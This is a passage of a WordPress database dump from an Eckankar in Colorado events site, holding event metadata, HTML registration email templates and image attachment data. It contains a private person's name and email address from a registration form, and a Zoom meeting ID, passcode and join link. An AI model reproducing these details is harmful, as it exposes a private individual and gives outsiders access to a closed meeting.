Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(157388,266432,'mec_fees_global_inheritance','1'),(157389,266432,'mec_fees','a:0:{}'),(157390,266432,'mec_ticket_variations_global_inheritance','1'),(157391,266432,'mec_ticket_variations','a:0:{}'),(157392,266432,'mec_reg_fields_global_inheritance','1'),(157393,266432,'mec_reg_fields','a:0:{}'),(157394,266432,'mec_bfixed_fields','a:0:{}'),(157395,266432,'mec_op','a:0:{}'),(157396,266432,'mec_fields','a:0:{}'),(157397,266432,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5948:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 40px 20px 40px 20px; background-color: #efefef; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 40px; font-family: arial, helvetica, sans-serif;\"><strong><span style=\"color: #1d5791;\">Eckankar In Colorado</span><br />\r\n</strong></span></p>\r\n<p style=\"margin: 0;\"><br />\r\n<span style=\"color: #666666; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:3101:\"<p>\r\n<style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>\r\n</p>\r\n<div style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; #cccccc; border-spacing: 0;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; width: 100%;\" align=\"center\"><!-- [if mso]>          </p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]>          </p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 40px 30px 30px 30px; text-align: center; font-size: 40px; font-weight: bold; color: #1d5791; font-family: raleway; background-color: #efefef; line-height: 15px;\"><span style=\"text-decoration: underline;\">Admin Notification</span><br />\r\n<br />\r\n<br />\r\n<span style=\"padding: 0px 0px 0px 0px; text-align: center; font-size: 25px; font-weight: bold; color: #333333; font-family: Arial, sans-serif; line-height: 25px;\"> </span><span style=\"padding: 0px; text-align: center; font-size: 30px; font-weight: bold; font-family: Arial, sans-serif; line-height: 25px; color: #f28a27;\">New Event Registration</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 30px; padding-top: 10px; background-color: #ffffff;\">\r\n<p style=\"font-size: 16px;\"><strong><span style=\"color: #333333; font-size: 20px;\">A new registration has been submitted for the following event.</span></strong></p>\r\n<p style=\"font-size: 18px;\"><strong><span style=\"color: #23507d; font-size: 19px;\">%%event_title%%</span></strong></p>\r\n<p style=\"font-size: 18px;\"><strong><span style=\"color: #23507d; font-size: 19px;\">Date: <span style=\"color: #333333;\">%%event_start_date%%</span></span></strong></p>\r\n<p style=\"font-size: 18px;\"><strong><span style=\"color: #23507d; font-size: 19px;\">Time: <span style=\"color: #333333;\">%%event_start_time%%</span></span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 30px; background-color: #efefef; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 30px; text-align: center; font-size: 12px; background-color: #747474; color: #cccccc;\">\r\n<p style=\"margin: 0; font-size: 14px; line-height: 20px;\">© Eckankar In Colorado -2022</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(157398,266432,'mec_event_status','EventScheduled'),(157399,266432,'mec_moved_online_link',''),(157400,266432,'mec_cancelled_reason',''),(157401,266432,'mec_display_cancellation_reason_in_single_page',''),(157402,266432,'protect_children',''),(157403,266432,'passster_activate_global_protection',NULL),(157404,266432,'passster_activate_protection',NULL),(157405,266432,'passster_protection_type','password'),(157406,266432,'boldgrid_hide_page_title','0'),(157407,266432,'_thumbnail_id','265538'),(157408,266432,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(157409,266432,'_dp_original','266384'),(161198,266644,'mec_verified','1'),(162529,247330,'_wp_old_date','2022-02-18'),(163453,266764,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-06-19\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-06-19\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(163451,266764,'mec_additional_organizer_ids','a:0:{}'),(160347,266586,'_form_id','17'),(160348,266586,'_seq_num','8'),(163452,266764,'mec_additional_location_ids','a:0:{}'),(163450,266764,'mec_currency','a:0:{}'),(160346,266586,'_field_184','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:41:\"Central Colorado - ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(160345,266586,'_field_183','US'),(160344,266586,'_field_182','CO'),(157476,266432,'_edit_lock','1649009457:2'),(160343,266586,'_field_181','deohobbs1@gmail.com'),(160341,266586,'_field_179','Deo'),(160342,266586,'_field_180','Hobbs'),(193894,269231,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:37:\"2023/10/sunset-gold-ocean-eagle-7.jpg\";s:8:\"filesize\";i:328706;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15288;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"sunset-gold-ocean-eagle-7-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98150;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5971;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59034;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19771;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47075;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30960;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21641;}s:8:\"tileview\";a:5:{s:4:\"file\";s:37:\"sunset-gold-ocean-eagle-7-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24899;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"sunset-gold-ocean-eagle-7-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:192620;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193893,269231,'_wp_attached_file','2023/10/sunset-gold-ocean-eagle-7.jpg'),(167902,267041,'mec_dont_show_map','0'),(166867,266905,'_edit_lock','1695008687:2'),(166868,266905,'_edit_last','2'),(166869,266906,'_wp_attached_file','2022/07/bkgrnd-only-5.png'),(166870,266906,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:912;s:6:\"height\";i:264;s:4:\"file\";s:25:\"2022/07/bkgrnd-only-5.png\";s:8:\"filesize\";i:12670;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"bkgrnd-only-5-300x87.png\";s:5:\"width\";i:300;s:6:\"height\";i:87;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1840;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"bkgrnd-only-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"bkgrnd-only-5-768x222.png\";s:5:\"width\";i:768;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5811;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"bkgrnd-only-5-300x264.png\";s:5:\"width\";i:300;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1390;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"bkgrnd-only-5-474x264.png\";s:5:\"width\";i:474;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1902;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"bkgrnd-only-5-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2955;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"bkgrnd-only-5-300x264.png\";s:5:\"width\";i:300;s:6:\"height\";i:264;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1390;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188228,268837,'mec_display_cancellation_reason_in_single_page',''),(188227,268837,'mec_cancelled_reason',''),(164848,266801,'_edit_lock','1658353922:2'),(164849,266801,'_edit_last','2'),(164850,266801,'boldgrid_hide_page_title','0'),(164851,266801,'boldgrid_in_page_containers','1'),(157496,261495,'_edit_lock','1695008787:2'),(161653,266676,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(157533,266432,'_edit_last','2'),(157534,266432,'boldgrid_in_page_containers','1'),(157509,266442,'_wp_attached_file','2022/03/mountain-white-wildflowers-4.jpg'),(157510,266442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1081;s:4:\"file\";s:40:\"2022/03/mountain-white-wildflowers-4.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"mountain-white-wildflowers-4-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:40:\"mountain-white-wildflowers-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"mountain-white-wildflowers-4-1536x865.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:865;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(157511,266442,'original-file','2022/03/mountain-white-wildflowers-4-updraft-pre-smush-original.jpg'),(157512,266442,'smush-complete','1'),(157513,266442,'smush-info','The file was compressed from 597.51 KB to 576.35 KB saving 3.54 percent using WP-Optimize'),(157514,266442,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:611853;s:12:\"smushed-size\";i:590178;s:15:\"savings-percent\";d:3.54000000000000003552713678800500929355621337890625;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:611853;s:10:\"compressed\";i:590178;}s:6:\"medium\";a:2:{s:8:\"original\";i:20158;s:10:\"compressed\";i:19616;}s:5:\"large\";a:2:{s:8:\"original\";i:174911;s:10:\"compressed\";i:169495;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9862;s:10:\"compressed\";i:9796;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:103424;s:10:\"compressed\";i:100015;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:33074;s:10:\"compressed\";i:32063;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:53273;s:10:\"compressed\";i:51522;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:36904;s:10:\"compressed\";i:35728;}s:8:\"tileview\";a:2:{s:8:\"original\";i:41496;s:10:\"compressed\";i:40256;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:353309;s:10:\"compressed\";i:344078;}}}'),(157527,266445,'original-file','2022/03/mountain-white-wildflowers-4b-1-updraft-pre-smush-original.jpg'),(157528,266445,'smush-complete','1'),(157529,266445,'smush-info','The file was compressed from 536.84 KB to 518.36 KB saving 3.44 percent using WP-Optimize'),(157530,266445,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:549725;s:12:\"smushed-size\";i:530804;s:15:\"savings-percent\";d:3.439999999999999946709294817992486059665679931640625;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:549725;s:10:\"compressed\";i:530804;}s:6:\"medium\";a:2:{s:8:\"original\";i:17937;s:10:\"compressed\";i:17490;}s:5:\"large\";a:2:{s:8:\"original\";i:155571;s:10:\"compressed\";i:150975;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9416;s:10:\"compressed\";i:9350;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:92113;s:10:\"compressed\";i:89249;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:31670;s:10:\"compressed\";i:30769;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:51148;s:10:\"compressed\";i:49616;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:35386;s:10:\"compressed\";i:34329;}s:8:\"tileview\";a:2:{s:8:\"original\";i:39409;s:10:\"compressed\";i:38234;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:314896;s:10:\"compressed\";i:306931;}}}'),(166658,266883,'mec_moved_online_link',''),(166659,266883,'mec_cancelled_reason',''),(166660,266883,'mec_display_cancellation_reason_in_single_page',''),(166661,266883,'protect_children',''),(166662,266883,'passster_activate_global_protection',NULL),(166663,266883,'passster_activate_protection',NULL),(166664,266883,'passster_protection_type','password'),(166665,266883,'boldgrid_hide_page_title','0'),(166666,266883,'_thumbnail_id','266884'),(166669,266883,'_dp_original','266311'),(166668,266883,'boldgrid_in_page_containers','1'),(166670,266883,'_edit_lock','1658157566:2'),(168221,267092,'mec_location_id','118'),(168220,267092,'mec_color',''),(157561,266405,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(157562,266405,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1648316971'),(161232,266654,'mec_event_id','266568'),(166747,266888,'mec_dont_show_map','0'),(166748,266888,'mec_organizer_id','1'),(166749,266888,'mec_read_more',''),(166750,266888,'mec_more_info',''),(166751,266888,'mec_more_info_title',''),(166752,266888,'mec_more_info_target','_self'),(166753,266888,'mec_cost',''),(166754,266888,'mec_currency','a:0:{}'),(166755,266888,'mec_additional_organizer_ids','a:0:{}'),(166756,266888,'mec_additional_location_ids','a:0:{}'),(166757,266888,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-09-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-09-11\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"2\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:1:\"2\";}}'),(166721,266886,'mec_gateway_label','Free'),(166722,266887,'mec_transaction_id','HNP42868'),(166723,266887,'mec_user_id','1000036'),(166671,266883,'_edit_last','2'),(157523,266445,'_wp_attached_file','2022/03/mountain-white-wildflowers-4b-1.jpg'),(157524,266445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:995;s:4:\"file\";s:43:\"2022/03/mountain-white-wildflowers-4b-1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"mountain-white-wildflowers-4b-1-1024x531.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:43:\"mountain-white-wildflowers-4b-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:44:\"mountain-white-wildflowers-4b-1-1536x796.jpg\"